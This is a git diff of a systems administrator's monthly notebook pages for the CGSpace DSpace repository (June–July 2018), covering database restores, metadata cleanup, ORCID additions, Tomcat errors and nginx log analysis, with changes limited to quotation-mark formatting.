          • I generated a list of CIFOR duplicates from the CIFOR_May_9 collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika
          • I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each “Item1” line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):
          -
          $ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html > ~/cifor-duplicates.txt
          -$ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cleaned.txt
          +
          $ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html > ~/cifor-duplicates.txt
          +$ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cleaned.txt
           
          • I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR’s collection
          • A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections
          • @@ -486,7 +486,7 @@ $ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cle
          • Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):
          -
          dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
          +
          dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
           

          2018-05-31

          • Clarify CGSpace’s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance
          • @@ -497,9 +497,9 @@ $ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cle $ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' $ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest $ psql -h localhost -U postgres dspacetest
          diff --git a/docs/2018-06/index.html b/docs/2018-06/index.html index 8a2a6de9a..5f5621532 100644 --- a/docs/2018-06/index.html +++ b/docs/2018-06/index.html @@ -58,7 +58,7 @@ real 74m42.646s user 8m5.056s sys 2m7.289s "/> - + @@ -154,7 +154,7 @@ sys 2m7.289s
        • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
        • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
        -
        $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
        +
        $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
         
        • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
        • Time to index ~70,000 items on CGSpace:
        • @@ -181,7 +181,7 @@ sys 2m7.289s
        • Institut National des Recherches Agricoles du B nin
        • Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement
        • Institut des Recherches Agricoles du B nin
        • -
        • Institut des Savannes, C te d' Ivoire
        • +
        • Institut des Savannes, C te d’ Ivoire
        • Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany
        • Projet de Gestion des Ressources Naturelles, B nin
        • Universit t Hannover
        • @@ -193,9 +193,9 @@ sys 2m7.289s
        • I uploaded fixes for all those now, but I will continue with the rest of the data later
        • Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:
        -
        delete from schema_version where version = '5.6.2015.12.03.2';
        -update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
        -update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
        +
        delete from schema_version where version = '5.6.2015.12.03.2';
        +update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
        +update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
         
        • And then I need to ignore the ignored ones:
        @@ -205,7 +205,7 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
      • Gabriela from CIP got back to me about the author names we were correcting on CGSpace
      • I did a quick sanity check on them and then did a test import with my fix-metadata-value.py script:
      -
      $ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
      +
      $ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
       
      • I will apply them on CGSpace tomorrow I think…
      @@ -221,7 +221,7 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
    • After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:
     INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
    -Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
    +Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
     
    • I can fix this by commenting out the ItemCollectionPlugin line of discovery.xml, but from looking at the git log I’m not actually sure if that is related to MQM or not
    • I will have to ask Atmire
    • @@ -336,11 +336,11 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
    or(
    -  value.contains('€'),
    -  value.contains('6g'),
    -  value.contains('6m'),
    -  value.contains('6d'),
    -  value.contains('6e')
    +  value.contains('€'),
    +  value.contains('6g'),
    +  value.contains('6m'),
    +  value.contains('6d'),
    +  value.contains('6e')
     )
     
    • So IITA should double check the abstracts for these: @@ -357,24 +357,24 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
    • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara’s items
    • I used my add-orcid-identifiers-csv.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
     
    • The contents of 2018-06-13-Robin-Buruchara.csv were:
    dc.contributor.author,cg.creator.id
    -"Buruchara, Robin",Robin Buruchara: 0000-0003-0934-1218
    -"Buruchara, Robin A.",Robin Buruchara: 0000-0003-0934-1218
    +"Buruchara, Robin",Robin Buruchara: 0000-0003-0934-1218
    +"Buruchara, Robin A.",Robin Buruchara: 0000-0003-0934-1218
     
    • On a hunch I checked to see if CGSpace’s bitstream cleanup was working properly and of course it’s broken:
    $ dspace cleanup -v
     ...
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(152402) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(152402) is still referenced from table "bundle".
     
    • As always, the solution is to delete that ID manually in PostgreSQL:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
     UPDATE 1
     

    2018-06-14

      @@ -389,9 +389,9 @@ UPDATE 1
    $ dropdb -h localhost -U postgres dspacetest
     $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
    -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
    +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
     $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
    -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
    +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
     
    • The -O option to pg_restore makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore
    • I always prefer to use the postgres user locally because it’s just easier than remembering the dspacetest user’s password, but then I couldn’t figure out why the resulting schema was owned by postgres
    • @@ -413,13 +413,13 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
    • So I need to make sure to run the following during the DSpace 5.8 upgrade:
    -- Delete existing CUA 4 migration if it exists
    -delete from schema_version where version = '5.6.2015.12.03.2';
    +delete from schema_version where version = '5.6.2015.12.03.2';
     
     -- Update version of CUA 4 migration
    -update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
    +update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
     
    --- Delete MQM migration since we're no longer using it
    -delete from schema_version where version = '5.5.2015.12.03.3';
    +-- Delete MQM migration since we're no longer using it
    +delete from schema_version where version = '5.5.2015.12.03.3';
     
    • After that you can run the migrations manually and then DSpace should work fine:
    @@ -427,17 +427,17 @@ delete from schema_version where version = '5.5.2015.12.03.3'; ... Done.
      -
    • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis' items on CGSpace
    • +
    • Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis’ items on CGSpace
    • I used my add-orcid-identifiers-csv.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
     
    • The contents of 2018-06-24-andy-jarvis-orcid.csv were:
    dc.contributor.author,cg.creator.id
    -"Jarvis, A.",Andy Jarvis: 0000-0001-6543-0798
    -"Jarvis, Andy",Andy Jarvis: 0000-0001-6543-0798
    -"Jarvis, Andrew",Andy Jarvis: 0000-0001-6543-0798
    +"Jarvis, A.",Andy Jarvis: 0000-0001-6543-0798
    +"Jarvis, Andy",Andy Jarvis: 0000-0001-6543-0798
    +"Jarvis, Andrew",Andy Jarvis: 0000-0001-6543-0798
     

    2018-06-26

    • Atmire got back to me to say that we can remove the itemCollectionPlugin and HasBitstreamsSSIPlugin beans from DSpace’s discovery.xml file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore
    • @@ -455,19 +455,19 @@ Done.
    • I’ll have to figure out how to separate those we’re keeping, deleting, and mapping into CIFOR’s archive collection
    • First, get the 62 deletes from Vika’s file and remove them from the collection:
    -
    $ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-delete.txt
    +
    $ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-delete.txt
     $ wc -l cifor-handle-to-delete.txt
     62 cifor-handle-to-delete.txt
     $ wc -l 10568-92904.csv
     2461 10568-92904.csv
    -$ while read line; do sed -i "\#$line#d" 10568-92904.csv; done < cifor-handle-to-delete.txt
    +$ while read line; do sed -i "\#$line#d" 10568-92904.csv; done < cifor-handle-to-delete.txt
     $ wc -l 10568-92904.csv
     2399 10568-92904.csv
     
    • This iterates over the handles for deletion and uses sed with an alternative pattern delimiter of ‘#’ (which must be escaped), because the pattern itself contains a ‘/’
    • The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:
    -
    $ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-map.txt
    +
    $ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' > cifor-handle-to-map.txt
     $ wc -l cifor-handle-to-map.txt
     50 cifor-handle-to-map.txt
     
      @@ -475,7 +475,7 @@ $ wc -l cifor-handle-to-map.txt
    • Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the id and collection columns using csvkit:
    $ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done < /tmp/cifor-handle-to-map.txt
    -$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 > map-to-cifor-archive.csv
    +$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 > map-to-cifor-archive.csv
     
    • Then I can use Open Refine to add the “CIFOR Archive” collection to the mappings
    • Importing the 2398 items via dspace metadata-import ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000
    • diff --git a/docs/2018-07/index.html b/docs/2018-07/index.html index 30fa9e0ce..df201be40 100644 --- a/docs/2018-07/index.html +++ b/docs/2018-07/index.html @@ -36,7 +36,7 @@ During the mvn package stage on the 5.8 branch I kept getting issues with java r There is insufficient memory for the Java Runtime Environment to continue. "/> - + @@ -134,7 +134,7 @@ There is insufficient memory for the Java Runtime Environment to continue.
    • As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
     
    • Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:
    • @@ -171,17 +171,17 @@ $ dspace database migrate ignored
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
     $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
     
    • I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:
    -
    dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
    +
    dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
      count
     -------
        785
    -dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
    +dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
      count
     -------
          4
    @@ -189,11 +189,11 @@ dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadat
     
  • I think I should fix that as well as some other garbage values like “test” and “dspace.ilri.org” etc:
  • dspace=# begin;
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
     UPDATE 785
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'books.google', 'https://books.google') where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
     UPDATE 4
    -dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
    +dspace=# update metadatavalue set text_value='https://books.google.com/books?id=meF1CLdPSF4C' where resource_type_id=2 and metadata_field_id=222 and text_value='meF1CLdPSF4C';
     UPDATE 1
     dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=222 and metadata_value_id in (2299312, 10684, 10700, 996403);
     DELETE 4
    @@ -202,7 +202,7 @@ dspace=# commit;
     
  • Testing DSpace 5.8 with PostgreSQL 9.6 and Tomcat 8.5.32 (instead of my usual 7.0.88) and for some reason I get autowire errors on Catalina startup with 8.5.32:
  • 03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
    - java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
    + java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
     	at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
     	at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
     	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
    @@ -217,7 +217,7 @@ dspace=# commit;
     	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
     	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
     	at java.lang.Thread.run(Thread.java:748)
    -Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
    +Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
     
    • Gotta check that out later…
    @@ -249,7 +249,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
  • Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (#384)
  • I regenerated the list of names for all our ORCID iDs using my resolve-orcids.py script:
  • -
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > /tmp/2018-07-08-orcids.txt
    +
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > /tmp/2018-07-08-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
     
    • But after comparing to the existing list of names I didn’t see much change, so I just ignored it
    • @@ -259,7 +259,7 @@ $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt
    • Uptime Robot said that CGSpace was down for two minutes early this morning but I don’t see anything in Tomcat logs or dmesg
    • Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat’s catalina.out:
    -
    Exception in thread "http-bio-127.0.0.1-8081-exec-557" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "http-bio-127.0.0.1-8081-exec-557" java.lang.OutOfMemoryError: Java heap space
     
    • I’m not sure if it’s the same error, but I see this in DSpace’s solr.log:
    @@ -274,7 +274,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
  • I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT
  • Looking in the nginx logs I see the top ten IP addresses active today:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "09/Jul/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "09/Jul/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1691 40.77.167.84
        1701 40.77.167.69
        1718 50.116.102.77
    @@ -288,7 +288,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
     
    • Of those, all except 70.32.83.92 and 50.116.102.77 are NOT re-using their Tomcat sessions, for example from the XMLUI logs:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
     4435
     
    • 95.108.181.88 appears to be Yandex, so I dunno why it’s creating so many sessions, as its user agent should match Tomcat’s Crawler Session Manager Valve
    • @@ -314,7 +314,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
    • Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC
    • These are the top ten users in the last two hours:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Jul/2018:(11|12|13)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Jul/2018:(11|12|13)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          81 193.95.22.113
          82 50.116.102.77
         112 40.77.167.90
    @@ -328,7 +328,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
     
    • Looks like 213.139.52.250 is Moayad testing his new CGSpace vizualization thing:
    -
    213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] "GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0" 200 53750 "http://localhost:4200/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
    +
    213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] "GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0" 200 53750 "http://localhost:4200/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
     
    • He said there was a bug that caused his app to request a bunch of invalid URLs
    • I’ll have to keep and eye on this and see how their platform evolves
    • @@ -349,7 +349,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
    • Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM
    • Here are the top ten IPs from last night and this morning:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "11/Jul/2018:22" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "11/Jul/2018:22" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          48 66.249.64.91
          50 35.227.26.162
          57 157.55.39.234
    @@ -360,7 +360,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
          97 183.128.40.185
          97 240e:f0:44:fa53:745a:8afe:d221:1232
        3634 208.110.72.10
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "12/Jul/2018:00" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "12/Jul/2018:00" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          25 216.244.66.198
          38 40.77.167.185
          46 66.249.64.93
    @@ -377,21 +377,21 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
     
  • A brief Google search doesn’t turn up any information about what this bot is, but lots of users complaining about it
  • This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
